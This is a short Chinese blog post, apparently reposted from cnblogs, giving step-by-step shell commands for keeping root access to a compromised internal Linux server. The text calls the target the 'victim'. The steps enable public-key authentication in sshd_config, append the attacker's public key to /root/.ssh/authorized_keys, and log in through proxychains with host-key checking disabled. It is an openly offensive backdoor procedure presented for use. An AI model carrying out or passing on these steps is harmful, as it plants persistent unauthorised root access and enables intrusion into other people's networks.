无密码通过代理登录内网linux服务器

时间：2021-04-07 11:05:28 阅读：0 评论：0 收藏：0 [点我收藏+]

标签：desktop ati 命令 id_rsa root权限 systemctl span a* sharp

RCE root权限执行命令，无法读取密码的情况下

1：在受害者机子上执行如下命令，开启认证

# echo RSAAuthentication yes >> /etc/ssh/sshd_config
# echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
# systemctl restart sshd

2：回到本地linux上生成密钥对

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
# ls -al /root/.ssh/
# cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
# mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys

3：被害机子上执行，追加操作

# echo ssh-rsa AA**+ldFbB root@Riter >> /root/.ssh/authorized_keys

4：本地开代理执行

proxychains4 ssh -t -o "StrictHostKeyChecking no" root@172.16.7.28

无密码通过代理登录内网linux服务器

标签：desktop ati 命令 id_rsa root权限 systemctl span a* sharp

原文地址：https://www.cnblogs.com/anbuxuan/p/14619921.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行